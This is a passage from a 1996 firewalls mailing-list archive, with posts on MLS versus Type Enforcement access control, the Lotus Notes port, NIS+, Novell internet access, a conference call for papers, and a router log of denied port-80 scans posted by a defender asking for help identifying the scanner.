truth. The COE network has much more security. It has a fair balance of usability vs. security. I am constantly trying to make it more secure without making it less usable. That secure telnet client would go a long way to helping here. >At least you already have some networks more protected so it seems you >are more aware of the issues that I had thought at first (so I >apologize for jumping so fast). The Spanish University I mentioned did >not seem to be, so the depth of the damage is unknown. No one knows >how deep they got, but the fact that disguised sniffers were found is >not comforting. Since all I know about this intrusion is second hand >and off-the-record, it might be pure invention. So those considering >asking (some already have), please refrain, I cannot tell who they are >unless they come forward. But it is worth some thinking even if it >just were an hypothetical case (similar cases have been reported >before anyway). > Luckily, with our current setup, it is easy to boot net - install workstations should a population of them become corrupted. The installation software is protected. (It also helps to have fast 8mm tape drives in emergencies - luckily we haven't had one in 2-3 years) -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Thu Feb 1 07:08:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA15699 for firewalls-outgoing; Thu, 1 Feb 1996 07:01:19 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA15694 for ; Thu, 1 Feb 1996 07:01:16 -0800 (PST) Received: from vodka.sse.att.com by ig4.att.att.com id AA26630; Thu, 1 Feb 96 09:53:13 EST Message-Id: <9602011453.AA26630@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Thanks for the helful Intrusion Detection refs To: firewalls@greatcircle.com Date: Thu, 1 Feb 1996 10:02:52 -0500 (EST) X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thank you to all who wrote with research leads in intrusion detection. They have proven most helpful and will probably keep me busy for a while as I try to trace them all down. I will send a copy of the responses I received to anyone who requests one by private email Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Thu Feb 1 07:24:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15402 for firewalls-outgoing; Thu, 1 Feb 1996 06:56:38 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA15388 for ; Thu, 1 Feb 1996 06:56:33 -0800 (PST) Received: from vodka.sse.att.com by ig4.att.att.com id AA23420; Thu, 1 Feb 96 09:48:24 EST Message-Id: <9602011448.AA23420@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Mandatory protection (was: product selection) To: t-jont@microsoft.com (Jonathon Tidswell) Date: Thu, 1 Feb 1996 09:58:00 -0500 (EST) Cc: IMCEAX400-c=US+3Ba=+20+3Bp=MSFT+3Bo=SOUTHPACIFIC+3Bdda+3ASMTP=firewalls+40greatcircle+2Ecom+3B@red-03-imc.itg.microsoft.com In-Reply-To: from "Jonathon Tidswell" at Jan 30, 96 11:55:18 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk JonT asks: > > > For those of use who dont have (or have not had) ready access to half a > dozen "secure" systems. > Can someone please comment on / answer the following ? > > - TE is a MAC mechanism for providing least privilege Rick Smith could probably speak better on this one. TE appears to be quite flexible and capable. > - MLS is a hierarchical labeling scheme for MAC (originally aimed at > confidentiality) MLS uses security labels that are composed of two elements: a hierachical level a set of categories The levels and categories are often assigned names such as "proprietary" and "payroll" respectively. The "proprietary" level means that this information should be handled according the the rules of the organization for proprietary information. Some information could be considered "public" and thus have more relaxed rules for handling. So "public" and "proprietary" are MLS levels showing increasing need for protection. You could have many kinds of information: payroll, capital, medical records, bids and proposals etc. Some of this information is publicly available (like earnings reports), some is highly proprietary (like medical records). A security label identifies information's level and content. So [proprietary, medical records] means the obvious. Users are cleared according to their level of trust, and need-to-know. And data files are carefully labeled. The OS controls the flow of information from one security label to another by a simple policy: Read down, write equal. This prevents [proprietary, payroll] data from getting mixed up with [proprietary, medical records] or being release to the [public]. Some programs might need access to *both* payroll and medical records. Such a program would run with the security label of [proprietary, payroll, medical records]. It could freely *read* both payroll and medical records, but it could not *write* to them. In fact every file that it created would bear the new label [proprietay, payroll, medical records] As you can see the MLS model is primarily concerned with protecting access to information. However the model has other uses. Fortunately, there are a number of MLS systems out there. The implementations tend to take the MLS model *very* seriously . I believe that these systems are good choices for firewall implementation because the MLS model can be used to protect the operation system code from user processes, and to separate programs into mutually exclusive domains. Plus, why not use existing technology if it meets the need. > - B2 systems require 'least privilege' mechanism (in addition to the MLS > required at B1) Yep > - Firewalls seem to be more intuitively served with least privilege than > with MLS There are a lot of firewall features that are "intuitively" served via least privilege. If the mechanism has sufficient granularity, it can control the ability to create executables, open devices, fork processes etc. It can also carve "root" into separate administrative roles so that the guy who does your backups doesn't wind up with unlimited access to your system. There are also a lot of firewall features that are easily served via MLS. It can protect the OS code, prevent the creation of trojan horses, control access to devices and files etc. Although "intuitively" one might think that MLS only has to do with data labeling. > > Is there a common model or mechanism (other than TE) for least privilege in > B2 (and above) systems ? Good question, wish I could answer it. My work has been with B1 systems that have some B2 and higher features such as some least privilege capabilities but w/o a general mechanism. USL/Novell/... has been working on a B2 Unix that has a least privilege mechanism, but I am not aware of any "common model" used industry wide. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Thu Feb 1 08:08:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA17267 for firewalls-outgoing; Thu, 1 Feb 1996 07:36:55 -0800 (PST) Received: from filoli.filoli.com (filoli.com [204.162.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA17262 for ; Thu, 1 Feb 1996 07:36:51 -0800 (PST) Received: from sunspot.filoli.com (root@sunspot.filoli.com [204.162.1.17]) by filoli.filoli.com (8.6.10/8.6.9) with ESMTP id HAA10454; Thu, 1 Feb 1996 07:35:54 -0800 Received: from filoli.com (amateur.filoli.com [204.162.1.179]) by sunspot.filoli.com (8.6.12/8.6.9) with ESMTP id HAA27161; Thu, 1 Feb 1996 07:35:54 -0800 Received: by filoli.com (SMI-8.6/SMI-SVR4) id HAA04095; Thu, 1 Feb 1996 07:35:50 -0800 Date: Thu, 1 Feb 1996 07:35:50 -0800 From: dan@filoli.com (Dan Curry) Message-Id: <199602011535.HAA04095@filoli.com> To: firewalls@GreatCircle.COM, cbk@starbase.ingress.com Subject: Re: Lotus Notes replication X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk # LOTUS NOTES # lotusnotes 1352/tcp # Lotus Notes > From firewalls-owner@GreatCircle.COM Wed Jan 31 22:56:34 1996 > Date: Thu, 1 Feb 1996 01:00:20 -0500 > X-Sender: cbk@ingress.com > Mime-Version: 1.0 > To: firewalls@GreatCircle.COM > From: cbk@starbase.ingress.com (Charles B. Kaplan) > Subject: Lotus Notes replication > > Does anyone know what ports Lotus Notes uses when it wants to replicate ? > > I want to plug these through my firewall. > > Thanks in advance. > > -CK > > From firewalls-owner Thu Feb 1 08:10:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA16981 for firewalls-outgoing; Thu, 1 Feb 1996 07:31:41 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA16958 for ; Thu, 1 Feb 1996 07:31:30 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by bb.hks.net (8.7/8.7-hks1) with SMTP id KAA28021 for ; Thu, 1 Feb 1996 10:27:57 -0500 Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id KAA02249; Thu, 1 Feb 1996 10:29:50 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma002247; Thu Feb 1 10:29:24 1996 Date: Thu, 1 Feb 1996 10:29:24 -0500 (EST) From: Chris Woods To: Ed Woodrick cc: "firewalls@bb.hks.net" Subject: RE: Internet-access from Novell In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 1 Feb 1996, Ed Woodrick wrote: > I know that this is probably a radical answer, but what about using = > Novel access permissions to restrict access to the data? I don't know = > why you would want to go to the trouble of putting up firewalls when = > just a simple permission change should work. It's a lot easier and I = > expect a lot safer to perform security at the operating system level = > than at the network level. That goes back to the host-level security vs. network-level security. There are many good reasons why host-level security is not usually feasible, the biggest being that it is not very scalable. For every new machine you install and attach to the LAN, you have to implement security measures. One also assumes that each individual on each host does not have the ability or knowledge to change the host-level security features. With network-level security, there is (theoretically) one point of potential access, which can be (theoretically) maintained by one entity (whether it's one person or one group of people) who can (again, theoretically) ensure that security policies are adhered to. Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com "Never underestimate the destructive power of a backhoe." -Brent Chapman From firewalls-owner Thu Feb 1 08:24:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18961 for firewalls-outgoing; Thu, 1 Feb 1996 08:09:09 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA18952 for ; Thu, 1 Feb 1996 08:09:00 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA03999; Thu, 1 Feb 96 11:11:05 EST Date: Thu, 1 Feb 1996 11:11:04 -0500 (EST) From: Scott Barman To: Finn T Andersen Cc: firewalls@greatcircle.com Subject: Re: NIS+ In-Reply-To: <9602011239.ZM14289@eagle.novo.dk> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 1 Feb 1996, Finn T Andersen wrote: > There has been a lot of good information and suggestions about NIS recently, > however, noone has mentioned anything about NIS+. > I have heard that NIS+ should be a very secure system, but in fact I have never > heard about anyone who was using it. Is it available, and on what platforms ? It's available for Solaris 2.3 and later and only from Sun (or any of their OEMs/VARs). NIS+ has a real problem interoperating with NIS, which most people have (if they're using NIS). scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Thu Feb 1 08:42:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA19831 for firewalls-outgoing; Thu, 1 Feb 1996 08:26:24 -0800 (PST) Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA19756 for ; Thu, 1 Feb 1996 08:26:03 -0800 (PST) Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id LAA15777 for ; Thu, 1 Feb 1996 11:24:46 -0501 Received: by shlep.sware.com (5.65/2.0) from mordred.sware.com id AA01519; Thu, 1 Feb 96 11:20:58 -0500 Received: by mordred.sware.com (5.65/2.1) id AA16488; Thu, 1 Feb 96 11:26:31 -0500 Message-Id: <9602011626.AA16488@mordred.sware.com> Subject: Re: Mandatory protection (was: product selection) To: Firewalls@GreatCircle.COM Date: Thu, 1 Feb 1996 11:26:31 -0500 (EST) From: Charles Watt X-Mailer: ELM [version 2.4 PL21] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Rick Smith > > I think we've covered most of the issues so far in the Type > Enforcement (TE) versus Multilevel Security (MLS) > discussion pretty well, but there are two remaining issues > that need clearing up. > > I don't think the unresolved topics arise from ignorance or > a simple failure to communicate; we have a genuine and > fully unintended culture clash. > > The first is a matter of credibility. Since the relevance > of anything else I say probably hinges on this, I'll start > here. > > "Does Rick Smith have a clue regarding MLS?" > > There are several people at the National Computer Security > Center and the MISSI Program Office that would be > astonished by this question. Before moving to firewalls I > was a key designer and the lead systems engineer on the SNS > Mail Guard, one of the few MLS systems that comes close to > being a turnkey device (I bring this up as evidence and not > as a topic of Firewalls discussion - comment privately if > you must). I've also done a variety of other MLS related > analysis, design, and implementation tasks. So I do have > some credentials. > > But my background is entirely in high assurance MLS systems. > Those are systems where MLS has only one meaning: obsessive > protection of confidentiality in accordance with the Bell > LaPadula access control rules. Labels define barriers to > information disclosure, and nothing in the platform > architecture or services is permitted to compromise > confidentiality. My statements on what MLS systems can and > can't do are based on the implications of highly assured > confidentiality, not on some "strawman" MLS notion nor on > "misconfigured" MLS systems. Actually, Rick, your analysis below does show a lack of understanding in the capabilities of most MLS systems. Your analysis assumes that the MAC labels enforced by such systems are strictly hierarchical, e.g.: Top Secret Secret Confidential Unclassified But all B1 systems that I am aware of also provide categories or compartmentalization of levels, creating a two-dimensional array, e.g. Classification Compartments -------------- ---------------------------------- Top Secret Category A, Category B, .... Secret Category A, Category B, .... Confidential Category A, Category B, .... Unclassified Category A, Category B, .... The classification is typically an integer. The compartments are usually a bit set. The actual setup can be considerably more complex than this. In order for information flow to occur, the reader (or recipient) of the information must be have a label dominating the label of the information, e.g., its classification >= classification of data compartment set a proper superset of the data's compartment set This has considerable implications in your analysis. > > That's where the culture clash comes in. My colleagues in > this discussion are using B1 MLS systems. These are systems > where confidentiality protection is not pursued to such an > extreme. This is *not* intended as a put-down, especially > in the firewalls environment. Firewalls don't need > obsessively strong confidentiality. They need integrity > protection. That's why we put TE in Sidewinder and left out > MLS -- we see MLS as a confidentiality mechanism and that's > not what we needed. But if you're using MLS for mandatory > protection and don't have an obsessively strong > confidentiality objective, then the picture changes a bit. > > Here's how this relates to the last open technical issue: > > "Can MLS systems protect Internet servers from one another?" Of course they can. See below. > > I've always recognized that MLS systems can impose mandatory > protection bariers between processes by using levels, > categories, and compartments, but I still concluded "No." > This is based on my view of high assurance MLS obsessed with > confidentiality. The argument goes as follows: > > 1) Typical Internet TCP/IP traffic does not contain labels. > 2) The network interface in an MLS system is always assigned > a label. > 3) If a network interface receives a packet that does not > already contain a label, then the packet must be assigned > the network interface's label. > 4) All packets sent or received as typical Internet TCP/IP > traffic carry the same label (from 1, 2, 3). Call this > label the "Internet Label." > 5) If two processes have the same label, there is no way to > enforce mandatory MLS protection between them. > 6) Every network server process is assigned a label. > 7) A network server process can only send and receive > packets if the packets' labels are identical to the label > of the network server process. Here your understanding of MLS networking breaks down. Read the existing standards, such as RFC 1108 or the DoD's Common Security Label spec. An interface is not controlled by a single label. Rather it is given an accreditation range, or set of labels, over which it can operate, e.g., Outside A, Outside A, Outside AB. You are correct that if it receives an unlabeled packet, most systems will give it a single default label regardless of port. > 8) Any network server process that handles Internet traffic > must be assigned the "Internet Label" (from 4, 7). No, it must be assigned any within the accreditation set of the interface. > 9) All Internet server processes must be assigned the > "Internet Label" (from 6, 8). No, they can be assigned different labels. > 10) You can't enforce MLS between Internet servers (from 5, 9). Sure you can -- easily. Server 1 (label = outside A) Server 2 (label = outside B) | | | | Interface (default label = outside, accreditation set = outside, outside A, outside B) With the above configuration, both servers can access the external interface. They can both read/write. They are completely separated by MAC. It is true that they must bind to a port, but the port space is not protected by any label, for it does not by itself contain any information. Proper separation is provided by the underlying protocol stack, which only permits a single process to bind to any given port. I'll certainly admit that it isn't the prettiest solution, but it sure works well. This has been the standard MLS approach for over 7 years, and it is well documented. We'll skip the remaining analysis, as it is based on incorrect assumptions. ... > > But the bottom line answer to the question, in the context > of *firewalls* and the irrelevance to them of a high > assurance obsession with confidentiality, appears to be > "Yes, If." IF the vendor puts in the trusted code to > associate different port numbers with different MLS process > labels, THEN their firewall *can* enforce mandatory MLS As shown above, this is not necessary. Most, if not all, MLS vendors already have these capabilities. > protection between Internet servers. It's not clear that a > firewall is "misconfigured" if this degree of protection is > omitted, but a thorough implementation really should > include it. So, if you're buying an MLS based firewall, > look for this feature. > > Peace? > > Rick. Now I'm not an expert on Type Enforcement, but we do have a couple of ex-SCC developers here. We've discussed the pros/cons of TE vs. MLS at length for quite some time and have come to the conclusion that ANYTHING that can be done with TE can also be done with MLS and vice versa. Of course the architectures are different, and some problems fit more naturally with one or the other approach. But the capabilites are virtually identical, particularly when applied to firewalls and similar separation problems. Charles Watt SecureWare, Inc. From firewalls-owner Thu Feb 1 08:53:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA20418 for firewalls-outgoing; Thu, 1 Feb 1996 08:42:50 -0800 (PST) Received: from mailme.hill.com (mailme.hill.com [199.182.20.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20406 for ; Thu, 1 Feb 1996 08:42:43 -0800 (PST) Received: from mail.hill.com (mail.hill.com [199.182.20.4]) by mailme.hill.com (8.6.9/8.6.9) with SMTP id LAA01554; Thu, 1 Feb 1996 11:16:20 -0500 Received: from cc:Mail by mail.hill.com id AA823197273; Thu, 01 Feb 96 09:25:43 EST Date: Thu, 01 Feb 96 09:25:43 EST From: "g.kessler" Message-Id: <9601018231.AA823197273@mail.hill.com> To: comp.dcom.cell-relay@indiana.edu (Cell Relay list), comp.dcom.frame-relay@indiana.edu (Frame Relay list), bmwg@harvard.edu, fca@amcc.com, fiber-channel-ext@think.com, firewalls@greatcircle.com, giga-owner@tele.pitt.edu, hippi@think.com, ip-atm@hpl.hp.com, ngtrans@sunroog.eng.sun.com, smds@cnri.reston.va.us, smdstc@nis.cerf.net, smds-users@nas.nasa.gov, aft@unify.com Subject: Re: Local Computer Network CFP... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk CALL FOR PAPERS 21st Annual Conference on Local Computer Networks "The Conference on Practical Leading Edge Computer Networking" September 29 - October 2, 1996, Minneapolis, Minnesota, USA Sponsored by: IEEE Computer Society TC - Computer Communications With the growing trend of personal communications and human central interfaces, future networks, both at home and in the office, will have very different characteristics. Wireless networks and multimedia applications further complicate the system design issue. The number of home offices is growing for environmental or economic reasons. Is there a system equally good for both home and office? Or, they are so different that a common system design won't be able to satisfy both? "Networking to/at home and office" will be the focus of the 21st LCN. Papers that cover these area are explicitly sought and will be given preference. Sessions are being organized on: 7 Internetworking/Routers/Bridges 7 Multimedia 7 Personal Communications 7 User Interfaces 7 ATM 7 Congestion Control 7 Emerging Technology 7 System Designs 7 Networking to/at home and office 7 High Speed Networks 7 Wireless Networks 7 LANs, MANs and WANs 7 Real-time Networks 7 High Performance Protocols 7 Network Management Important Dates: Submission: March 14, 1996 Acceptance: June 18, 1996 Camera Copy: Aug. 1, 1996 For more information, please view the LCN Web page at: http://www.hill.com/lcn/lcn.html Information for Authors: All authors must submit 5 copies of the full technical paper in English by mail or delivery services. DO NOT SUBMIT COMPLETE PAPERS BY FAX. However, E-mail submission of plain postscript file is encouraged. In this case, no encoding, postscript is ASCII, and no compression is allowed. Further, the postscript file must be able to print on 8.5"x11" paper. The first page must contain: title of the paper, author's names including affiliations, complete mailing address, telephone and fax numbers, E-mail address, and a 250-word (maximum) abstract (double spaced) to Shu-Ping Chang, Program Chair, at the address below: Dr. Shu-Ping Chang IBM, Thomas J. Watson Research Center 30 Saw Mill River Road, H2-C18 Hawthorne, NY 10532 USA Phone: +1 914 784-7746 Fax: +1 914 784-6318 Internet: spchang@watson.ibm.com From firewalls-owner Thu Feb 1 08:58:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18718 for firewalls-outgoing; Thu, 1 Feb 1996 08:04:45 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA18713 for ; Thu, 1 Feb 1996 08:04:39 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by bb.hks.net (8.7/8.7-hks1) with SMTP id LAA28160 for ; Thu, 1 Feb 1996 11:01:08 -0500 Received: by Disclosure.COM (4.1/SMI-4.1) id AA03983; Thu, 1 Feb 96 11:06:57 EST Date: Thu, 1 Feb 1996 11:06:55 -0500 (EST) From: Scott Barman To: "Andrew K. Bressen" Cc: firewalls@bb.hks.net Subject: Re: Internet-access from Novell In-Reply-To: <4eq1q9$q58@bb.hks.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 1 Feb 1996, Andrew K. Bressen wrote: > > I'm confronting the same issue with a client right now, > only with an added problem... more on that; first, here > is a summary of what I've seen mentioned here and elsewhere, > plus pointers to the PC magazine reviews of same: > > > Anybody got any others? Please cc me on replies. BSDI has a system they call "BSDI Internet Gateway for Novell Networks." You may want to check them out at http://www.bsdi.com/products/novell/. scott -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Thu Feb 1 09:23:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA22111 for firewalls-outgoing; Thu, 1 Feb 1996 09:16:51 -0800 (PST) Received: from netcom4.netcom.com (netcom4.netcom.com [192.100.81.107]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA22105 for ; Thu, 1 Feb 1996 09:16:46 -0800 (PST) Received: by netcom4.netcom.com (8.6.12/Netcom) id JAA06390; Thu, 1 Feb 1996 09:14:52 -0800 Date: Thu, 1 Feb 1996 09:14:51 -0800 (PST) From: Leroy Lacy Subject: Re: Most Secure Unix? To: Jon Spencer cc: goertzek@wangfed.com, Firewall List In-Reply-To: <9601302118.AA02298@tsgops.rtp.dg.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian: well they are good products. The problem is that the systems are just TCP./IP firewalls and cost an arm and a leg. Most of the night hawks come in for around 100K. If we compete with them, we'll always have a good margin. Leroy From firewalls-owner Thu Feb 1 09:53:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA22909 for firewalls-outgoing; Thu, 1 Feb 1996 09:37:56 -0800 (PST) Received: from gatekeeper.b400.cbe.ab.ca (gatekeeper.b400.cbe.ab.ca [164.166.2.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA22903 for ; Thu, 1 Feb 1996 09:37:50 -0800 (PST) Received: (from smap@localhost) by gatekeeper.b400.cbe.ab.ca (8.6.12/8.6.9) id KAA01877 for ; Thu, 1 Feb 1996 10:36:37 -0700 Received: from iss101.b400.cbe.ab.ca(164.166.4.2) by gatekeeper.b400.cbe.ab.ca via smap (V1.3) id sma001871; Thu Feb 1 10:36:34 1996 Received: from net02 (Net02.b400.cbe.ab.ca) by CBE.AB.CA (PMDF V4.3-13 #5915) id <01I0P2GRKWO09PM0FT@CBE.AB.CA>; Thu, 01 Feb 1996 10:38:29 -0700 (MST) Date: Thu, 01 Feb 1996 10:36:08 -0700 From: netmgr02@cbe.ab.ca (Glen Larwill) Subject: Scanning from afar... X-Sender: netmgr02@mail.b400.cbe.ab.ca To: firewalls@greatcircle.com Message-id: <01I0P2GRLPLU9PM0FT@CBE.AB.CA> X-Envelope-to: firewalls@greatcircle.com MIME-version: 1.0 X-Mailer: Content-type: text/plain; charset="us-ascii" Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone seen this type of network scanning before? Addresses have been changed to protect the inocent and the guilty. Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet Jan 30 11:14:51.926: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet Jan 30 11:14:52.930: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet Jan 30 11:14:53.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet Jan 30 11:14:54.978: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet Jan 30 11:14:55.958: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet Jan 30 11:14:56.934: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet Jan 30 11:19:49.000: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet Jan 30 11:20:49.028: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet Jan 30 11:20:49.036: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet The node in question here has scanned a few other subnets looking for connections to port 80. Is this a recognised scanning program or something home grown? I have attempted to contact someone at the remote network, but have not received a response. Glen Larwill - glarwill@cbe.ab.ca _/_/_/_/ _/_/_/_/ _/_/_/_/ PH (403) 294-8380, FAX (403) 294-8431 _/ _/ _/ _/ Network Systems Software Analyst _/ _/_/_/_/ _/_/_/ Calgary Board of Education _/ _/ _/ _/ Calgary Alberta, Canada _/_/_/_/ _/_/_/_/ _/_/_/_/ From firewalls-owner Thu Feb 1 10:27:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24850 for firewalls-outgoing; Thu, 1 Feb 1996 10:20:29 -0800 (PST) Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA24845 for ; Thu, 1 Feb 1996 10:20:22 -0800 (PST) Received: from rssi.com by relay7.UU.NET with SMTP id QQabbl29496; Thu, 1 Feb 1996 13:19:09 -0500 (EST) Received: from mel.rssi.com by rssi.com (SMI-8.6/SMI-SVR4) id NAA16637; Thu, 1 Feb 1996 13:19:07 -0500 Received: by mel.rssi.com (5.x/SMI-SVR4) id AA01125; Thu, 1 Feb 1996 13:14:49 -0500 Date: Thu, 1 Feb 1996 13:14:49 -0500 From: Brad VanOrden Message-Id: <9602011814.AA01125@mel.rssi.com> To: maddouri@ensi.rnrt.tn, firewalls@GreatCircle.com 